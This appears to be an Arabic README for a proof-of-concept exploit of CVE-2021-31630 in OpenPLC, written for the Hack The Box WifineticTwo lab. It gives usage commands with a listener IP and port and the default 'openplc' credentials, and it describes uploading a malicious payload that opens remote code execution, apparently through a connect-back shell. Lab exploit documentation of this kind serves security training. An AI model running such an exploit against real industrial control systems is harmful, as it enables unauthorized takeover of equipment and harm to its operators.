
استغلال إثبات المفهوم (PoC) لـ CVE-2021-31630، يستهدف خدمة OpenPLC العاملة على جهاز WifineticTwo على منصة Hack The Box.
استغلال CVE-2021-31630 PoC لـ OpenPLC على جهاز WifineticTwo (Hack The Box)، هذا البرنامج النصي بمثابة إثبات مفهوم (PoC) لاستغلال CVE-2021-31630، مستهدفاً خدمة OpenPLC العاملة على جهاز WifineticTwo على منصة Hack The Box.
python exploit.py -ip <IP_ADDRESS_FOR_LISTEN> -p <PORT_FOR_LISTEN> -u <USERNAME> -pwd <PASSWORD>
python ./exploit.py -ip 10.10.16.5 -p 1337 -u openplc -pwd openplc
-ip <IP_ADDRESS>: يحدد عنوان IP للاستماع عليه.-p : يحدد المنفذ للاستماع عليه.-u : يحدد اسم المستخدم لتسجيل الدخول إلى OpenPLC.-pwd : يحدد كلمة المرور لتسجيل الدخول إلى OpenPLC.يستغل هذا البرنامج النصي ثغرة CVE-2021-31630 في OpenPLC، مما يتيح تنفيذ التعليمات البرمجية عن بُعد على جهاز WifineticTwo. يقوم بإنشاء اتصال بعنوان IP والمنفذ الهدف، ويصادق باستخدام اسم المستخدم وكلمة المرور المقدمين، ويرفع حمولة خبيثة لتنفيذ تعليمات برمجية عشوائية.
تم إنشاؤه بواسطة z1ntrx
هذا البرنامج النصي مخصص لأغراض التعليم والاختبار فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.